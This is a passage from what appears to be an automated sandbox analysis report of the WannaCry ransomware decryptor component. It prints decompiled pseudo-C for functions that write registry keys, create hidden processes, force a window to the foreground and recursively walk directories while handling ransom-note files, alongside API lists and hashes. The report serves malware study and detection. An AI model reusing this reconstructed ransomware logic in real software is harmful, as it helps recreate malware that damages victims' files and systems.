                                  • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                  • RegQueryValueExA.KERNELBASE ref: 00401D81
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                  • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                  • String ID: Software\$WanaCrypt0r
                                  • API String ID: 3883271862-1723423467
                                  • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                  • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                  • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004085C0 Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 155 4085c0-408652 #567 #341 GetSysColor * 4 KiUserCallbackDispatcher 156 408660-4086a6 #6140 155->156 157 408654-408658 155->157 157->156 158 40865a-40865e GetSysColor 157->158 158->156
                                  C-Code - Quality: 83%
                                  			E004085C0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				int _t33;
				intOrPtr _t50;
				long _t53;
				intOrPtr _t55;

				_push(0xffffffff);
				_push(E00413FF3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_t50 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x4157f0;
				_v4 = 0;
				L00412F74();
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(__ecx)) = 0x4161a4;
				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
				_t53 = GetSysColor(2);
				_v20 = _t53;
				_v24 = 0;
				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
				if(_t33 != 0 && _v24 != 0) {
					_t53 = GetSysColor(0x1b);
				}
				_push(0xffffffff);
				_push(2);
				L00412F50();
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
				 *((intOrPtr*)(_t50 + 0x68)) = 0;
				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
				 *((intOrPtr*)(_t50 + 0x54)) = 0;
				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
				 *[fs:0x0] = _v20;
				return _t50;
			}












                                  0x004085c0
                                  0x004085c2
                                  0x004085cd
                                  0x004085ce
                                  0x004085db
                                  0x004085de
                                  0x004085e2
                                  0x004085e7
                                  0x004085f2
                                  0x004085f6
                                  0x00408601
                                  0x00408604
                                  0x00408607
                                  0x0040860a
                                  0x00408612
                                  0x00408617
                                  0x00408621
                                  0x00408628
                                  0x0040862f
                                  0x00408634
                                  0x00408642
                                  0x00408646
                                  0x0040864a
                                  0x00408652
                                  0x0040865e
                                  0x0040865e
                                  0x00408660
                                  0x00408662
                                  0x00408667
                                  0x00408674
                                  0x0040867d
                                  0x00408680
                                  0x00408687
                                  0x0040868a
                                  0x00408691
                                  0x00408694
                                  0x0040869c
                                  0x004086a6

                                  APIs
                                  • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                  • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                  • GetSysColor.USER32 ref: 0040861D
                                  • GetSysColor.USER32(00000009), ref: 00408624
                                  • GetSysColor.USER32(00000012), ref: 0040862B
                                  • GetSysColor.USER32(00000002), ref: 00408632
                                  • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                  • GetSysColor.USER32(0000001B), ref: 0040865C
                                  • #6140.MFC42(00000002,000000FF), ref: 00408667
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Color$#341#567#6140CallbackDispatcherUser
                                  • String ID:
                                  • API String ID: 2603677082-0
                                  • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                  • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                  • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B620 Relevance: 13.5, APIs: 9, Instructions: 45windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
				struct HWND__* _t4;
				struct HWND__* _t15;

				_t4 = FindWindowW(0, _a4); // executed
				_t15 = _t4;
				if(_t15 != 0) {
					ShowWindow(_t15, 5);
					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
					SetForegroundWindow(_t15);
					SetFocus(_t15);
					SetActiveWindow(_t15);
					BringWindowToTop(_t15);
					_t4 = _a8;
					if(_t4 != 0) {
						ExitProcess(0);
					}
				}
				return _t4;
			}





                                  0x0040b628
                                  0x0040b62e
                                  0x0040b632
                                  0x0040b638
                                  0x0040b651
                                  0x0040b660
                                  0x0040b663
                                  0x0040b66a
                                  0x0040b671
                                  0x0040b678
                                  0x0040b67e
                                  0x0040b685
                                  0x0040b689
                                  0x0040b689
                                  0x0040b685
                                  0x0040b690

                                  APIs
                                  • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                  • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                  • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                  • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                  • SetForegroundWindow.USER32(00000000), ref: 0040B663
                                  • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                  • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                  • BringWindowToTop.USER32(00000000), ref: 0040B678
                                  • ExitProcess.KERNEL32 ref: 0040B689
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
                                  • String ID:
                                  • API String ID: 962039509-0
                                  • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                  • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                  • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A90 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68processsynchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 163 401a90-401aeb CreateProcessA 164 401b45-401b4c 163->164 165 401aed-401af3 163->165 166 401af5-401b03 WaitForSingleObject 165->166 167 401b26-401b44 CloseHandle * 2 165->167 168 401b12-401b18 166->168 169 401b05-401b0c TerminateProcess 166->169 168->167 170 401b1a-401b20 GetExitCodeProcess 168->170 169->168 170->167
                                  C-Code - Quality: 100%
                                  			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _STARTUPINFOA _v68;
				struct _PROCESS_INFORMATION _v84;
				void* _t21;
				int _t23;
				long _t25;
				DWORD* _t30;

				_v68.cb = 0x44;
				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
				_v84.hThread = _t21;
				_v84.dwProcessId = _t21;
				_v84.dwThreadId = _t21;
				_v84.hProcess = 0;
				_v68.dwFlags = 1;
				_v68.wShowWindow = 0;
				_t23 = CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84); // executed
				if(_t23 == 0) {
					return 0;
				} else {
					_t25 = _a8;
					if(_t25 != 0) {
						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
							TerminateProcess(_v84.hProcess, 0xffffffff);
						}
						_t30 = _a12;
						if(_t30 != 0) {
							GetExitCodeProcess(_v84.hProcess, _t30);
						}
					}
					CloseHandle(_v84);
					CloseHandle(_v84.hThread);
					return 1;
				}
			}









                                  0x00401aa0
                                  0x00401aa8
                                  0x00401ab5
                                  0x00401abb
                                  0x00401ac5
                                  0x00401ad2
                                  0x00401ad6
                                  0x00401ade
                                  0x00401ae3
                                  0x00401aeb
                                  0x00401b4c
                                  0x00401aed
                                  0x00401aed
                                  0x00401af3
                                  0x00401b03
                                  0x00401b0c
                                  0x00401b0c
                                  0x00401b12
                                  0x00401b18
                                  0x00401b20
                                  0x00401b20
                                  0x00401b18
                                  0x00401b31
                                  0x00401b38
                                  0x00401b44
                                  0x00401b44

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                  • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                  • String ID: D
                                  • API String ID: 786732093-2746444292
                                  • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                  • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                  • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 171 401a10-401a18 172 401a21 171->172 173 401a1a-401a1f 171->173 174 401a26-401a38 fopen 172->174 173->174 175 401a3a-401a44 174->175 176 401a6f-401a73 174->176 177 401a53-401a58 fwrite 175->177 178 401a46-401a51 fread 175->178 179 401a5e-401a64 177->179 178->179 180 401a74-401a84 fclose 179->180 181 401a66-401a6c fclose 179->181 181->176
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fclose$fopenfreadfwrite
                                  • String ID: c.wnry
                                  • API String ID: 2140422903-3240288721
                                  • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                  • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                  • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004043E0 Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 182 4043e0-404408 #4284 #3874 #5277
                                  C-Code - Quality: 50%
                                  			E004043E0(void* __ecx) {
				void* _t3;

				_push(1);
				_push(0x100);
				_push(0);
				L00412DDC();
				_t3 = __ecx + 0x40;
				_push(_t3); // executed
				L00412DD6(); // executed
				 *((char*)(__ecx + 0x5a)) = 0;
				L00412C14();
				return _t3;
			}




                                  0x004043e1
                                  0x004043e3
                                  0x004043ea
                                  0x004043ec
                                  0x004043f1
                                  0x004043f6
                                  0x004043f7
                                  0x004043fe
                                  0x00404402
                                  0x00404408

                                  APIs
                                  • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                  • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                  • #5277.MFC42 ref: 00404402
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3874#4284#5277
                                  • String ID:
                                  • API String ID: 1717392697-0
                                  • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                  • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                  • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004133E6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 183 4133e6-4133fb #1576
                                  C-Code - Quality: 28%
                                  			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {

				_t1 =  &_a16; // 0x413236
				_push( *_t1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				L0041343E(); // executed
				return __eax;
			}



                                  0x004133e6
                                  0x004133e6
                                  0x004133ea
                                  0x004133ee
                                  0x004133f2
                                  0x004133f6
                                  0x004133fb

                                  APIs
                                  • #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1576
                                  • String ID: 62A
                                  • API String ID: 1976119259-856450375
                                  • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction ID: 1789da96975510f8b15a36ac976bc3503c656fbbd280c19756f03076dd05f2b6
                                  • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                  • Instruction Fuzzy Hash: AFB008360193D6ABCB12DE91890196ABAA2BB98305F484C1DB2A50146187668568AB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 004026B0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 334 4026b0-40274b call 40c8f0 * 2 swprintf FindFirstFileW 339 4027b4-4027bc 334->339 340 40274d-4027af call 402e00 #825 call 402e00 #825 334->340 342 4027c2-4027ca 339->342 356 402ace-402ae4 340->356 344 4027d4-4027e8 wcscmp 342->344 345 4027cc-4027ce 342->345 348 40295d-402972 FindNextFileW 344->348 349 4027ee-402802 wcscmp 344->349 345->344 347 402978-40298b FindClose 345->347 351 4029b9-4029c1 347->351 352 40298d-402995 347->352 348->342 348->347 349->348 353 402808-402838 swprintf GetFileAttributesW 349->353 354 4029c3-4029cb 351->354 355 4029ef-402a4d swprintf DeleteFileW swprintf DeleteFileW 351->355 357 402997-402999 352->357 358 40299b-4029a0 352->358 359 4028b6-4028ca wcscmp 353->359 360 40283a-402850 call 402af0 353->360 362 4029d1-4029d6 354->362 363 4029cd-4029cf 354->363 364 402a6a-402a92 #825 355->364 365 402a4f-402a64 call 402e90 355->365 357->351 357->358 367 4029a2 358->367 368 4029a7-4029b7 call 402560 358->368 359->348 361 4028d0-4028e4 wcscmp 359->361 360->348 380 402856-4028b1 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 402da0 360->380 361->348 369 4028e6-4028fa wcscmp 361->369 370 4029d8 362->370 371 4029dd-4029ed call 4026b0 362->371 363->355 363->362 374 402a94-402ab8 call 402d90 call 402e90 364->374 375 402aba-402acd #825 364->375 386 402a66 365->386 367->368 368->351 368->352 369->348 377 4028fc-402953 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 402da0 369->377 370->371 371->354 371->355 374->375 375->356 391 402957 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 377->391 380->391 386->364 391->348
                                  C-Code - Quality: 74%
                                  			E004026B0(void* __ecx) {
				void* _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr _t124;
				char _t125;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t135;
				int _t139;
				int _t145;
				int _t146;
				int _t147;
				int _t149;
				int _t154;
				intOrPtr* _t221;
				void _t225;
				intOrPtr* _t226;
				wchar_t* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t242;

				_push(0xffffffff);
				_push(E0041356E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t234;
				_t235 = _t234 - 0x56c;
				_t232 = __ecx;
				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
				 *((intOrPtr*)(_t235 + 0x24)) = 0;
				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
				 *(_t235 + 0x584) = 0;
				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((char*)(_t235 + 0x588)) = 1;
				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
				_t236 = _t235 + 0xc;
				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
				 *(_t236 + 0x18) = _t109;
				if(_t109 != 0xffffffff) {
					while(1) {
						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
						if(_t110 != 0 &&  *_t110 != 0) {
							break;
						}
						_t111 = wcscmp(_t236 + 0x358, ".");
						_t236 = _t236 + 8;
						if(_t111 != 0) {
							_t139 = wcscmp(_t236 + 0x358, L"..");
							_t236 = _t236 + 8;
							if(_t139 != 0) {
								_push(_t236 + 0x358);
								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
								_t236 = _t236 + 0x10;
								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
									_t236 = _t236 + 8;
									if(_t145 != 0) {
										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
										_t236 = _t236 + 8;
										if(_t146 != 0) {
											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
											_t236 = _t236 + 8;
											if(_t147 != 0) {
												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
												_t149 = wcslen(_t236 + 0x5c);
												_t236 = _t236 + 4;
												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
												 *((char*)(_t236 + 0x590)) = 3;
												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
												 *((char*)(_t236 + 0x584)) = 1;
												_push(1);
												goto L14;
											}
										}
									}
								} else {
									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
										_t154 = wcslen(_t236 + 0x5c);
										_t236 = _t236 + 4;
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
										 *((char*)(_t236 + 0x590)) = 2;
										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
										 *((char*)(_t236 + 0x584)) = 1;
										_push(1);
										L14:
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
									}
								}
							}
						}
						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
							continue;
						}
						break;
					}
					FindClose( *(_t236 + 0x20));
					_t115 =  *(_t236 + 0x18);
					_t225 =  *_t115;
					if(_t225 != _t115) {
						while(1) {
							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t135 != 0 &&  *_t135 != 0) {
								goto L22;
							}
							_t136 =  *((intOrPtr*)(_t225 + 0xc));
							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E00402560(_t232, _t136);
							_t225 =  *_t225;
							if(_t225 !=  *(_t236 + 0x18)) {
								continue;
							}
							goto L22;
						}
					}
					L22:
					_t116 =  *((intOrPtr*)(_t236 + 0x28));
					_t226 =  *_t116;
					if(_t226 != _t116) {
						while(1) {
							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t131 != 0 &&  *_t131 != 0) {
								goto L28;
							}
							_t132 =  *((intOrPtr*)(_t226 + 0xc));
							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E004026B0(_t232, _t132);
							_t226 =  *_t226;
							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
								continue;
							}
							goto L28;
						}
					}
					L28:
					_t227 =  *(_t236 + 0x58c);
					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
					_t237 = _t236 + 0x10;
					DeleteFileW(_t237 + 0x5c);
					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
					_t238 = _t237 + 0x10;
